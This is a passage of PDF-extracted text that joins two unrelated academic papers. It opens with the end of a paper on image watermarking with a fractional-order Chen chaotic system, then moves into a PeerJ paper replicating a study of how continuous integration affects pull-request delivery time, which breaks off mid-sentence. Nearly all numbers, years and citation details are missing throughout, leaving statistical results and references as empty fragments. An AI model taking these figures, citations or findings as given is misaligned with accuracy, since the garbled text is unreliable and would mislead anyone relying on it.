extraction result . conclusion through research, a new image watermarking scheme based on the fractional order chen chaotic system and discrete wavelet transform is proposed. the fractional order chen chaotic system is used to increase the overall complexity of the algorithm. chaotic system is used to deal with the digital watermarking, and the watermarking information is embedded into the original image which is processed by discrete wavelet transform. by analyzing and comparing the experimental results show that the proposed watermarking scheme has high security and stronger robustness and invisibility. all these characteristics demonstrate that the proposed scheme is in favor of image watermarking encryption. acknowledgment this work was supported by national nature science foundation of china (no: ). references [ ] s. poonkuntran, r.s. rajesh. “chaotic model based semi fragile watermarking using integer transforms for digital fundus image authentication”, multimedia tools & applications, vol. , no. ,pp. - , . [ ] x.j.tong, y.liu, m.zhang, et al. “a novel chaos-based fragile watermarking for image tampering detection and self-recovery”, signal process image commun, vol. , no. ,pp. - , . [ ] s.behnia, m.teshnehlab, p.ayubi. “multiple-watermarking scheme based on improved chaotic maps”, communications in nonlinear science & numerical simulation, vol. , no. ,pp. - , . [ ] t.g.gao, q.l.gu, s.emmanuel. “a novel image authentication scheme based on hyper-chaotic cell neural network”, chaos solitons&fractals, vol. , no. ,pp. - , . [ ] a.mooney, j.g.keating, i.pitas. “a comparative study of chaotic and white noise signals in digital watermarking”, chaos solitons&fractals, vol. , no. ,pp. - , . [ ] g.y.gao, g.p.jiang. “zero-bit watermarking resisting geometric attacks based on composite-chaos optimized svr model”, the journal of china universities of posts and telecommunications, vol. , no. ,pp. - , . image watermarking encryption scheme based on fractional order chaotic system [ ] s.rawat, b.raman. “a publicly verifiable lossless watermarking scheme for copyright protection and ownership assertion”, aeu-international journal of electronics and communications, vol. ,no. ,pp. - , . [ ] m.r.keyvanpour, f.m.bayat. “blind image watermarking method based on chaotic key and dynamic coefficient quantization in the dwt domain”, mathematical&computer modelling, vol. ,pp. - , . [ ] d.y.zhao, j.p.chen, j.c.sun. “design and implementation of improved watermarking system in wt domain”, the journal of china universities of posts and telecommunications, vol. ,no. ,pp. - , . [ ] m.barni, f.bartolini, a.piva. “improved wavelet-based watermarking through pixel-wise masking”, ieee transactions on image processing a publication of the ieee signal processing society, vol. ,no. ,pp. - , . [ ] b.y.lei, d.ni, s.p.chen, et al. “optimal image watermarking scheme based on chaotic map and quaternion wavelet transform”, nonlinear dynamics, vol. ,no. ,pp. - , . [ ] o.benrhouma, h.hermassi, s.belghith. “tamper detection and self-recovery scheme by dwt watermarking”, nonlinear dynamics, vol. ,no. ,pp. - , . [ ] j.song, z.zhang. “a digital watermark method based on svd in wavelet domain”, international journal of advancements in computing technology, vol. ,no. ,pp. - , . [ ] g.p.tang, x.f.liao, y.chen. “a novel method for designing s-boxes based on chaotic maps”, chaos solitons&fractals, vol. ,no. ,pp. - , . [ ] c.p.li, g.j.peng. “chaos in chen’s system with a fractional order”, chaos solitons&fractals, vol. ,no. ,pp. - , . 
[ ] s.m.kenneth, r.bertram. “an introduction to the fractional calculus and fractional differential equations”, wiley-interscience, vol. ,no. ,pp. - , . [ ] j.h.song, j.w.song, y.h.bao. “a blind digital watermark method based on svd and chaos”, procedia engineering, vol. ,no. ,pp. - , . [ ] t.h.chen, g.b.horng, w.b.lee. “a publicly verifiable copyright-proving scheme resistant to malicious attacks”, ieee transactions on industrial electronics, vol. ,no. ,pp. - , . [ ] w.b.pennebaker, j.l.mitchell. jpeg still image data compression standard, new york: van nostrand reinhold, . [ ] t.acharya, p.s.tsai. jpeg standard for image compression: concepts, algorithms and vlsi architectures,new york: john wiley & sons, . [ ] r.c.gonzalez, r.e.woods. digital image processing, new york: addison-wesley longman publishing co., inc., . [ ] w.k.pratt. digital image processing,new york: wiley & sons, . [ ] a.rosenfeld a, a.c.kak. digital picture processing,cambridge, massachusetts: academic press, . author brief and sponsors: dawei ding, he is an associate professor with school of electronics and information engineering at anhui university, hefei, china. his research area include communications networks, the nonlinear circuit network, the network congestion control, non- linear dynamics and chaos, bifurcation, etc.. submitted august accepted november published december corresponding author philipp leitner, philipp.leitner@chalmers.se academic editor arie van deursen additional information and declarations can be found on page doi . /peerj-cs. copyright guo and leitner distributed under creative commons cc-by . open access studying the impact of ci on pull request delivery time in open source projects—a conceptual replication yunfang guo and philipp leitner software engineering division, chalmers | university of gothenburg, gothenburg, sweden abstract nowadays, continuous integration (ci) is indispensable in the software development process. a central promise of adopting ci is that new features or bug fixes can be delivered more quickly. a recent repository mining study by bernardo, da costa & kulesza ( ) found that only about half of the investigated open source projects actually deliver pull requests (pr) faster after adopting ci, with small effect sizes. however, there are some concerns regarding the methodology used by bernardo et al., which may potentially limit the trustworthiness of this finding. particularly, they do not explicitly control for normal changes in the pull request delivery time during a project’s lifetime (independently of ci introduction). hence, in our work, we conduct a conceptual replication of this study. in a first step, we replicate their study results using the same subjects and methodology. in a second step, we address the same core research question using an adapted methodology. we use a different statistical method (regression discontinuity design, rdd) that is more robust towards the confounding factor of projects potentially getting faster in delivering prs over time naturally, and we introduce a control group of comparable projects that never applied ci. finally, we also evaluate the generalizability of the original findings on a set of new open source projects sampled using the same methodology. we find that the results of the study by bernardo et al. largely hold in our replication. using rdd, we do not find robust evidence of projects getting faster at delivering prs without ci, and we similarly do not see a speed-up in our control group that never introduced ci. 
further, results obtained from a newly mined set of projects are comparable to the original findings. in conclusion, we consider the replication successful. subjects software engineering keywords continuous integration, mining software repositories, replication, pull-request based development introduction continuous integration (ci) is by now a popular practice in the software commu- nity (duvall, matyas & glover, ). ci helps developers integrate changes frequently in a collaborative manner. as a distributed and cooperative practice, ci is commonly used in both, commercial and open source software (oss) development. considerable previous research has investigated the impact of ci on oss projects. vasilescu et al. ( ) found that core developers are able to discover more bugs using ci. ståhl & bosch ( ) claim that integrators tend to release more frequently after adopting ci. finally, a recent study how to cite this article guo y, leitner p. . studying the impact of ci on pull request delivery time in open source projects—a con- ceptual replication. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:philipp.leitner@chalmers.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. by bernardo, da costa & kulesza ( ) empirically analyzed whether ci improves the time-to-delivery of merged pull requests (prs) that are submitted to github projects. interestingly, this study revealed that only . % of the analyzed oss projects actually deliver merged prs more quickly after adopting ci. the authors present an increase in pr submission numbers after adopting ci as a possible reason for this relatively counter- intuitive result. further, the authors used regression analysis to identify two factors (merge workload and queue rank) that are the main predictors of pr delivery time. however, we observe that the study by bernardo et al. exhibits some important limitations. firstly, their methodology consists of comparing various pr related metrics before and after ci adoption without controlling for confounding factors, most importantly that pr delivery time may increase or decrease naturally over the lifetime of a project. for example, it is conceivable that projects may just naturally get better at merging prs over time, independently of whether they adopt ci or not. secondly, they do not make use of a control group of projects that never adopted ci in the first place. in our opinion, this limits the trustworthiness of the results of bernardo et al. hence, in our work, we present a conceptual replication (shull et al., ) of this study. we replicate their work and investigate the same research questions with slightly different methodology, and by incorporating additional study objects. concretely, we investigate the following research questions. rq : exact replication. can the original study results be reproduced? as a baseline, we reproduce the original results of the study, using the same methodology and the data provided by the authors. we are able to achieve very similar results, with minor differences (between . and . percentage points difference to the originally published results). rq : conceptual replication. 
to extend the original study methodology, and address the concerns we have with the experimental methodology as initially proposed, we investigate two different aspects: rq . : can similar results to the original study be found when controlling for changes in pr delivery time over the lifetime of a project? to answer this question, we apply regression discontinuity design –rdd (thistlethwaite & campbell, ), a statistical method that allowed us to evaluate whether there is a trend of pr delivery times over time, and whether this trend changes significantly when ci is introduced. we find no clear evidence of such trends in the data, alleviating our concerns in this regard. however, we observe that pr delivery times depend strongly on when in the release cycle a pr is merged. prs that are merged close to the next release are released much quicker than prs that come in shortly after a release. this indicates that, ultimately, ci introduction may have less impact on pr delivery times than how often a project releases. rq . : are there other factors besides merge workload and queue rank that strongly impact the pr delivery time? based on the results of rq . , we hypothesize that one important factor impacting pr delivery time that is not directly captured in the original study is when in the release cycle a new pr is submitted. we incorporate this additional variable into the regression model, and evaluate whether it is a better predictor than the variables in the guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. original study. we find that this ‘‘come-in time’’ indeed is the best predictor of pr delivery time for a majority of projects. rq : generalizability. finally, to evaluate the generalizability of the results, we apply our adapted methodology to two new data sets, a new data set of study subjects collected using the same methodology as in the original study, and a control group of projects that have similar characteristics but have, to the best of our knowledge, never applied ci. rq . : can similar results be found when applying the same methodology to different projects that have also adopted ci? we find that results found for a new set of study subjects vary up to percentage points. however, the high-level conclusions drawn by the original study still hold for our replication using new data. hence, we consider the original findings to be largely confirmed using additional data, with the caveat that the individual differences between projects may be very high. rq . : can similar results be found when applying the same methodology to different projects that have never adopted ci? finally, we collect a control group of comparable projects that have never adopted ci. we observe results that vary between and percentage points from what has been observed based in the original data, i.e., the results of applying the same methods on a control group are only mildly more different than applying the same method on a new test group (rq . ). however, we observe that projects in the control group do not increase the number of prs they are able to handle per release over time. this is different to both test groups, where we observe a statistically significant increase in submitted, merged, and released prs per release after ci adoption. in summary, we consider the replication successful. our concern regarding trends in the data has largely been alleviated, and an analysis of a control group has led to, at least subtly, different results. 
however, our results also indicate that pr delivery times seem to more strongly depend on when in the release cycle a pr comes in than on whether or not a ci system is present. this is consistent with the original study, which also reported that the presence of ci only impacts delivery time metrics with small effect sizes. our study sheds some more light on why this is the case. finally, we conclude that the delivery time of prs is not strongly impacted by whether a project adopts ci, but projects that do are able to handle more prs per release than projects that do not. the present article is based on work conducted by the first author over five months in early as part of her master’s thesis project at chalmers university of technology, under the supervision of the second author (guo, ). the results presented here are a summary of this work, and more details can be found in the thesis report. background we now present important background on ci and the pull request based development model. further, we summarize the main results of bernardo, da costa & kulesza ( ), which we attempt to replicate in our study. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ci and the pull request based development model ci is a practice which has originated from agile software development and extreme programming. its core tenet is the merging of all developer working copies to shared mainline several times a day. each integration is then verified by an automated build, which allows errors to be detected and located as early as possible (see also online https://www.thoughtworks.com/continuous-integration). ci promises manifold benefits, such as quickening the delivery of new functionalities (laukkanen, paasivaara & arvonen, ), reducing problems of code integration in a collaborative environment (vasilescu et al., ), hence guaranteeing the stability of the code in the mainline. consequently, ci has found widespread practitioner adoption (hilton et al., ), making it a relevant subject of academic study. tightly linked to ci (and to the github open source development platform— https://github.com) is the idea of pull request based development (see also fig. for a schematic overview). in this model, the main repository is not shared with external developers. instead, prospective contributors fork the central repository and clone it to a local repository. the contributor makes changes to the local repository, and commits their changes there. these local changes are then submitted to the main repository by opening a pr in the central repository. a ci system, such as travis-ci (https://travis-ci.com), then automatically merges the pr into a test branch and runs the tests to check if the pr breaks the build. finally, one or more rounds of code review (bacchelli & bird, ; mcintosh et al., ) are conducted and the integrator decides whether to approve the pr, after which it is merged and closed. does using ci lead to faster pull request delivery? note that a ci system is not strictly required for the pull request based development model to be followed. bernardo, da costa & kulesza ( ) have studied whether using a ci system, which, as described, automates much of the testing that integrators otherwise would have to do manually, leads to shorter pr delivery times. they collected , prs and , releases of oss projects using the github api, and addressed the following three research questions: rq : are merged pull requests released more quickly using ci? 
rq : does the increased development activity after adopting ci increase the delivery time of prs? rq : what factors impact the delivery time after adopting ci? by applying non-parametric tests to the merge and delivery time of prs, the authors drew the conclusion for rq that only half of the projects deliver prs faster after adopting ci, but . % of the studied projects merge prs faster before using ci. in rq , they found that there is a considerable increase in the pr submission, merge and delivery rate, concluding that this may be the reason why projects do not deliver merged prs faster after adopting ci. they also found that the number of releases per year does not change significantly after ci adoption. in rq , they built linear regression models for each project and used the wald x maximum likelihood test to evaluate the explanatory power of a number of different factors. they found that the two variables with the highest explanatory guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.thoughtworks.com/continuous-integration https://github.com https://travis-ci.com http://dx.doi.org/ . /peerj-cs. figure an overview of the pull request based development model. full-size doi: . /peerjcs. /fig- power were both related to the volume of prs that have to be merged, namely the merge workload (how many prs are waiting to be merged?) and queue rank (is the pr at the beginning or the end of the merge queue?). related work we now discuss previous work in related fields and how the research questions in the study fill in gaps presented in the field. ci adoption and pull requests previous researchers have investigated the impact of adopting ci in projects in multiple aspects. most papers agreed that the introduction of ci is beneficial to projects. manglaviti et al. ( ) examined the human resources that are associated with developing and maintaining ci systems. they analyzed , github repositories that adopt travis-ci using quantitative methods. the authors found that for projects with growing contributor bases, adopting ci becomes increasingly beneficial and sustainable as the projects age. further, there is a strong expectation that ci should improve the productivity of projects. miller ( ) analyzed the impact of ci by summarizing their experience with ci in a distributed team environment at microsoft in . they collected various ci related data in their daily work. teams moving to a ci driven process can expect to achieve at least a % reduction in check-in overhead when compared to a check-in process that maintains the same level of the code base and product quality. ståhl & bosch ( ) argued based on survey results that build and test automation saves programmer’s time for more creative work, and should thus increase productivity. stolberg ( ) argued that ci practices speed up the delivery of software by decreasing integration times. however, not all previous study agree that adopting ci improves productivity. for instance, parsons, ryu & lal ( ) found no clear benefits of ci on either productivity or quality. related research has shown that the pr based development model is popular in oss projects. for instance, vasilescu et al. ( ) collected github projects and found guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. that for of project ( %), builds corresponding to prs are much more likely to succeed than builds corresponding to direct pushes. 
gousios, pinzger & van deursen ( ) found that % of repositories are using prs on github. they selected projects from the ghtorrent corpus, and concluded that the pr model offers fast turnaround, increased opportunities for community engagement, and decreased time to incorporate contributions. ci impact on pull request success and release frequency our study focuses on whether ci has an impact on pr delivery time. bernardo, da costa & kulesza ( ) have conducted an extensive mining study on this subject (as discussed in more detail in ‘does using ci lead to faster pull request delivery?’). our present work is a conceptual replication of their paper. hilton et al. ( ) have previously analyzed , open source projects from github and surveyed developers. the authors found that ci helps projects release twice as often and that when using ci, prs are accepted . hours sooner in median. vasilescu et al. ( ) studied the usage of travis-ci in a sample of github projects written in ruby, python, and java. they found that the majority of projects ( . %) are configured to use travis-ci, but less than half actually use it. in follow-up research, they investigated the productivity and quality of github projects that use ci (vasilescu et al., ). they found that projects that use ci successfully process, accept, and merge more prs. this increased productivity does not appear to be gained at the expense of quality. finally, yu et al. ( ) collected , prs from different github projects. they investigated which factors affect pr evaluation latency in github by applying a linear regression model and quantitative analysis. they found that the size of pr and the availability of the ci pipeline are strong predictors or pr delivery time. in later work, the same authors used a linear regression model to analyze which factors affect the process of the pull request based development model in the context of ci (yu et al., ). they found that the likelihood of rejection of a pr increases by . % when the pr breaks the build. the results also show that the more succinct a pr is, the greater the probability that such a pr is reviewed and merged quickly. replication studies the need for conducting more replications of published research is by now rather widely accepted in the software engineering community, as documented through efforts such as the rose festival (held, for instance, at icse (https:// .icse-conferences.org/track/icse- -rose-festival) and fse (https://github.com/researchart/rose -fse ) in ). in general, replication is necessary to increase the trust in any individual piece of research –the results of any one study alone cannot be extrapolated to all environments, as there are typically many uncontrollable sources of variation between different environments (shull et al., ). successful replication increases the validity and reliability of the outcomes observed in an experiment (juristo & gmez, ). shull et al. ( ) distinguish two types of replication studies. in exact replications, the original experimental design is followed as exactly as possible, while a conceptual replication attempts to answer the same research questions using an adapted methodology. we argue that conceptual replications are even guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https:// .icse-conferences.org/track/icse- -rose-festival https:// .icse-conferences.org/track/icse- -rose-festival https://github.com/researchart/rose -fse http://dx.doi.org/ . /peerj-cs. 
more important than exact ones, as they allow us to control for deficiencies in research design, whereas exact replications mostly validate experiment execution. however, not all researchers share this excitement about replication studies. shepperd ( ) argued that, due to wide prediction intervals, most replications end up successful anyway. further, according to basili, shull & lanubile ( ), replication studies in software engineering are particularly difficult to conduct, as experiments in this field usually involve a large number of context variables. consequently, a systematic mapping study of replications in the software engineering field (shull et al., ) concluded that the absolute number of replications is still small, in particular considering the breadth of topics in software engineering. their study retrieved more than , articles, from which they selected articles reporting only replications. our work is a contribution towards increasing the trustworthiness of research on the impact of ci on pr delivery times. our replication design combines exact with conceptual replication—we decide to not deviate far from the original design of bernardo, da costa & kulesza ( ), and also largely follow their style of presentation, while at the same time addressing the methodological concerns we had with their original work. method the goal of the present study is to replicate and extend the results from earlier work presented in ‘does using ci lead to faster pull request delivery?’. we now discuss our scientific methodology and the data that has been used. fig. provides a schematic overview. for rq , rq . , and rq . , the data set from the original study is re-used. for rq . and rq . , two new data sets are collected from github. for rq , the original statistical methods are re-used. for rq . , an alternative analysis approach (rdd) is employed. for rq . , the same method is extended with an additional analysis variable (the point in time in the release cycle when a pr is submitted, ‘‘come-in time’’). for rq . , all analyses are applied to the new data sets. for rq . , we only apply non-parametric tests, as our findings do not warrant applying the rest of the analyses to this data set. all data as well as the necessary analysis scripts are publicly available on github https://github.com/radialine/do- open-source-projects-deliver-pull-requests-faster-using-ci. study subjects and data collection as depicted in fig. , our study relies on three different sets of study objects –the original data provided by the authors, a set of new projects collected using the same methodology (new data), and a control group consisting of projects collected using the same methodology, but which, crucially, have to the best of our knowledge never adopted ci (control data). basic information about the three data sets is contained in table . the collection procedure is further described below. original data we re-use the data that bernardo, da costa & kulesza ( ) have made available online https://prdeliverydelay.github.io/#datasets. however, for a subset of our analysis, we need guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci https://prdeliverydelay.github.io/#datasets http://dx.doi.org/ . /peerj-cs. original new control rq rq . rq . rq . rq . rq results non-parametric test rq . results rdd rq . 
results linear regression rq . results rq . results all three methods original paper results compare non-parametric test figure overview of study methodology and used data. shaded elements are re-used from bernardo, da costa & kulesza ( ). full-size doi: . /peerjcs. /fig- additional information not contained in the original data (e.g., the exact point in time when a pr was merged). this information was collected directly through the github api. new data for collecting a new data set, we largely follow the process originally used by bernardo, da costa & kulesza ( ), which in turn was inspired by vasilescu et al. ( ). we identify the most highly-starred projects on github written in java, python, php, ruby, and javascript. this leads to a total of unique projects (projects that use multiple of these languages are counted only once). we discard all projects that are not using travis-ci, as well as all projects that were already contained in the original data set. we further exclude all projects that have less than merged prs before or after ci adoption. that is, we only consider projects that have had reasonable development activity before and after adopting ci. finally, we also discard toy projects, tutorials, and other similar projects that are not intended to be deployed to production. this leaves us with projects, for which we then collect pr and release data using git and the github api. control data we use the same process as for new data to collect a control group, with the key difference that we discard all projects for which we can tell that they are, or have been, using any ci system, leading to projects. note that this data set is smaller, as, given the prevalence of ci, it is difficult to find high-profile projects with similar characteristics to the projects in the other two data sets which never adopted ci in their lifetime. analysis methods as shown in fig. , we use three different statistical methods in our study. we replicate two of the methods used in the original study, and introduce a third, new, method (regression discontinuity design, rdd). guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table basic data set statistics. data set # of projects total # of prs original data . new data . control data . methods re-used from the original study in line with the original work, we use non-parametric hypothesis testing (mann-whitney- wilcoxon, mww) for testing whether there is a statistically significant difference in pull request delivery time before and after ci introduction. mww is used as data normality could not be assumed. mww is used in conjunction with cliffs delta to measure effect sizes, using the standard threshold values as defined by romano et al. ( ). additionally, we use a multiple regression model fitted with ordinary least squares to identify which factors best explain a dependent variable (delivery delay, in our case). we use the wald x maximum likelihood test to evaluate the explanatory power of each independent variable. rdd due to our concern that the original study did not properly control for changes in pr submissions and pr delivery time that are independent of ci (due to, for instance, project growth or other project lifetime related factors), we extend the original work with an additional statistical method, rdd, as inspired by the work of zhao et al. ( ). 
rdd is a fairly old idea firstly proposed by thistlethwaite & campbell ( ), which is seeing a renaissance in recent years (imbens & lemieux, ). it is a quasi-experimental pretest- posttest design that elicits the causal effects of interventions by assigning a cutoff above or below when an intervention is applied (ci introduction, in our case). the assumption of rdd is that the trend continues without changes if the intervention does not exist. we would conclude that ci had a significant impact if there is an obvious discontinuity around the cutoff point (the point in time when the intervention has been applied). a core question when applying rdd is which model(s) to use for fitting the data before and after the intervention. in this study, four models of rdd are used, as sketched in fig. . the linear model with common slope assumes that the data before and after the intervention can be fit using the same linear regression model (shifted by a constant), while the linear model with different slopes only assumes that both sides can be fit by any linear regression. the non-linear model assumes that at least one side requires fitting using a non-linear regression. finally, local linear regression performs exactly that using the imbens-kalyanaraman optimal bandwidth calculation. results we now discuss the results for each research question. given that this is a replication study, a particular emphasis will be put on comparing our results to bernardo, da costa & kulesza ( ) and evaluating to what extent the results therein still hold. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure rdd estimation models. full-size doi: . /peerjcs. /fig- pr submitted pr merged pr released md (merge delay) dd (delivery delay) pl (pull request lifetime) figure graphical overview of the evaluated metrics dd, md, and pl. adapted from bernardo, da costa & kulesza ( ). full-size doi: . /peerjcs. /fig- rq –exact replication as a first step in the study, we conducted an exact replication of bernardo, da costa & kulesza ( ), based on the data that the authors provide. this was deemed necessary as a first step of validation, but also to acquire the necessary in-depth knowledge about the original study’s design choices. rq of the original study investigated the impact of adopting ci on the delivery time of prs. they analyzed three metrics, which are delivery delay (dd, days between when a pr got merged and when it was released), merge delay (md, days between when a pr was submitted and when it was merged), and pull request lifetime (pl). a visual overview of these metrics and what they mean in the pr lifecycle is presented in fig. . guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table results of the exact replication of rq in bernardo, da costa & kulesza ( ). faster with ci [% of projects] stat. different [% of projects] dd original . % . % replication . % . % difference . . md original % . % replication . % . % difference . . pl original . % . % replication . % . % difference . after carefully studying the original paper and limited follow-up discussion with the authors through private communications, we are able to reproduce their results. table contrasts the original results with the results of our exact replication. 
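expressed on the mined timestamps, the three metrics are plain date differences. the following sketch derives them per pull request; the column names are hypothetical stand-ins for whatever the mined data set actually provides.

```python
import pandas as pd

def pr_delay_metrics(prs: pd.DataFrame) -> pd.DataFrame:
    """add md (merge delay), dd (delivery delay) and pl (pr lifetime), in days.

    expects datetime columns 'submitted_at', 'merged_at' and 'released_at'
    (hypothetical column names) for each merged-and-released pr."""
    out = prs.copy()
    day = pd.Timedelta(days=1)
    out["md"] = (out["merged_at"] - out["submitted_at"]) / day    # merge delay
    out["dd"] = (out["released_at"] - out["merged_at"]) / day     # delivery delay
    out["pl"] = (out["released_at"] - out["submitted_at"]) / day  # pr lifetime
    return out
```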
we report on the percentage of projects for which each of these metrics improved after introducing ci (i.e., handling prs became faster) and the percentage of projects for which there is a statistically significant difference (in any direction). cliff’s delta effect sizes for the latter metric vary between . and . (i.e., a small effect size), except for the changes in pull request liftetime, where we observe medium or even large effect sizes for a majority of projects. it is interesting to note that even though we used the same methods on the same data, we were not able to achieve entirely identical results (differences between . and . percentage points). we speculate that the observed differences may be due to undocumented data cleaning procedures or updates to the publicly available data set. however, given that the main findings of the study remain unchanged, we nonetheless consider the replication successful. rq in the original study then tried to find the reason for this phenomenon. the authors compare the number of submitted, merged, and released prs before and after ci adoption. we again replicate this analysis, leading to the results depicted in fig. . for this analysis step, our results are virtually identical to what has been presented in bernardo, da costa & kulesza ( ). we observe that after ci was adopted, thenumber of submitted, merged and released prs per release increases statistically significantly with medium effect sizes. interestingly, the release frequency does not change statistically significantly after adopting ci. box . summary and lessons learned. we were able to conduct an exact replication of the original paper, with minor dif- ferences in the results (between . and . percentage points). all main results of the original study are confirmed. this analysis indeed supports that only about half the projects deliver prs faster (with a small effect size) after introducing ci, but less than a third of projects improves how fast they merge prs (again with a small effect size). while projects do not seem to release more frequently, they can handle more prs per release after ci adoption. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of merged and released prs per release before (‘‘no-ci’’) and after (‘‘ci’’) in- troduction of ci. full-size doi: . /peerjcs. /fig- rq –conceptual replication we now discuss the two additional analysis steps we have introduced in our study in comparison to the original work. application of rdd (rq . ) in the first step of our conceptual replication, we use rdd to analyze whether there are gradual changes in pr delivery time over the lifetime of projects, independently of ci introduction. however, an initial visual inspection of both, dd and pl, reveals that these metrics follow a clear pattern that is independent of ci introduction. figures and depict this for two example projects (mantl/mantl and mozilla-b g/gaia). virtually all projects in the original data set follow a similar pattern, indicating that these metrics are to a large degree dominated by when in the release cycle a pr comes in –prs merged shortly after a release need to wait for the next release to roll around, while prs merged shortly before a release get released much quicker. it is unlikely that the introduction of ci has much direct impact on this. 
it should be noted that this is true even for pl, which represents the entire delivery time of a pr (i.e., the time it takes maintainers to merge a pr plus the time the pr then waits to get released). hence, it seems unlikely that the introduction of ci can impact this end-to-end delivery time of a pr by much. this also explains why we, similar to the original study, observe primarily differences with small effect sizes in rq . ultimately, the end-to-end delivery time is presumably much guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure visual inspection of metric delivery delay (dd) for two example projects. (a) mantl/mantl, (b) mozilla-b g/gaia. the x-axis represents project lifetime in weeks, with point being the rdd cutoff point (i.e., the time when ci has been adopted in the project). full-size doi: . /peerjcs. /fig- figure visual inspection of metric pull request lifetime (pl) for two example projects. (a) mantl/- mantl, (b) mozilla-b g/gaia. the x-axis represents project lifetime in weeks, with point being the rdd cutoff point (i.e., the time when ci has been adopted in the project). full-size doi: . /peerjcs. /fig- more dependent on how frequently a project releases than on whether a ci system is used, which we have established in rq to not be impacted by ci adoption. however, no such pattern exists for the third metric, md. hence, we attempt to apply all four rdd models described in ‘analysis methods’. the data of each project is divided into two buckets separated by the cutoff point (when ci was adopted), and one model for each bucket is fit. fig. shows the fitted models of project boto/boto. in the first three models, the red and blue lines fit data after and before the intervention respectively. it is evident that neither the two linear models (figs. a and b) provide sufficient fit to accurately represent the data for boto/boto. indeed, the linear or non-linear models never achieve an r value higher than . for any of the projects. the local linear regression model depicted in fig. d provides a better, albeit still very noisy, fit to the data. hence, we conclude that there is no, or at least no particularly relevant, ‘‘natural trend’’ of md getting faster or slower over time in any of the projects. hence, we consider our original concern with the work of bernardo, da costa & kulesza ( ) (that projects may just naturally get faster or slower over time) to be unsupported. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure four rdd models fit for project boto/boto. (a) linear model (common slope). (b) linear model (diff slopes). (c) non-linear model. (d) local linear regression model. the x-axis represents project lifetime in weeks, with point being the rdd cutoff point (i.e., the time when ci has been adopted in the project). full-size doi: . /peerjcs. /fig- evaluation of “come-in time” as predictor of pr delivery time (rq . ) in an attempt to explain what exactly impacts the end-to-end lifetime of a pr (pl), the original study built a multiple regression model based on different variables (related to characteristics of the project, the pr submitter, and the pr itself). they found that three metrics (merge workload, queue rank, and, to a lesser degree, the contributor) had significant explanatory power with regards to pl. 
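for reference, the two linear rdd variants used above can be written as ordinary segmented regressions: a time variable centred on the adoption week, a treatment indicator, and (for the different-slopes model) their interaction. the sketch below fits both for the merge delay of one project with statsmodels; the column names are hypothetical, and the local linear variant with the imbens-kalyanaraman bandwidth is not reproduced here.

```python
import pandas as pd
import statsmodels.formula.api as smf

def fit_rdd_linear(prs: pd.DataFrame, cutoff_week: float):
    """fit the two linear rdd variants for the merge delay (md) of one project.

    prs: one row per merged pr with 'week' (project lifetime in weeks) and 'md'
    (merge delay in days) -- hypothetical column names."""
    df = prs.copy()
    df["t"] = df["week"] - cutoff_week           # centre time on ci adoption
    df["after"] = (df["t"] >= 0).astype(int)     # treatment indicator

    common = smf.ols("md ~ t + after", data=df).fit()      # common slope
    different = smf.ols("md ~ t * after", data=df).fit()   # different slopes

    # a jump at the cutoff shows up as a significant 'after' coefficient,
    # a change of trend as a significant 't:after' interaction
    return {"common_slope": common, "different_slopes": different}
```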
before ci adoption, the merge workload has the highest explanatory power, which changes to the queue rank after adoption. based on our previous findings, we speculate that in fact the most important predictor of end-to-end pr delivery time may be when in the release cycle a pr has been merged. we refer to this new factor as ‘‘come-in time’’, and provide a schematic overview of its definition in fig. . we re-use the original methodological setup (regression analysis using ordinary least squares), but use the variables sketched in table . we remove all variables which had an explanatory power close to in the original study, leaving us with potential factors guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure definition of the factor ‘‘come-in time’’. full-size doi: . /peerjcs. /fig- table description of all variables used in the regression model. the first variables are re-used from bernardo, da costa & kulesza ( ), the last variable has been newly introduced in our study. variable definition variables from original study number of activities an activity is an action to a pr conducted by a github user, e.g., labeled, assigned, etc. it is assumed that a large number of activities may lead to longer delivery times. merge time the time between when a pr was created and when it was merged by an integrator (md). contributor experience the number of released prs that were created by the same author. we speculate that contributions by an experienced contributor may be evaluated less critically, and hence may be delivered faster. contributor integration the mean delivery time in days of the past prs submitted by this contributor. if past prs were released quickly, then the next pr submitted by the same person may also be released rapidly. merge workload the number of prs waiting to be merged at the time when the pr was submitted. we speculate that, as the time and energy of integrators is limited, the workload of an integrator may have an impact on delivery times. queue rank this variable represents the order of the merged prs in a release cycle. a merged pr might be released faster or slower depending of its position in the merge queue. new variable come-in time the time in days between the time when a pr got merged and the time of the last release (see also figure ??). this new variable is motivated by our previous findings. of influence (‘‘merge workload’’, ‘‘queue rank’’, ‘‘contributor experience’’, ‘‘contributor integration’’, ‘‘number of activities’’, and ‘‘merge time’’). we add the new variable ‘‘come-in time’’ to this set. from these variables, we build two regression models for 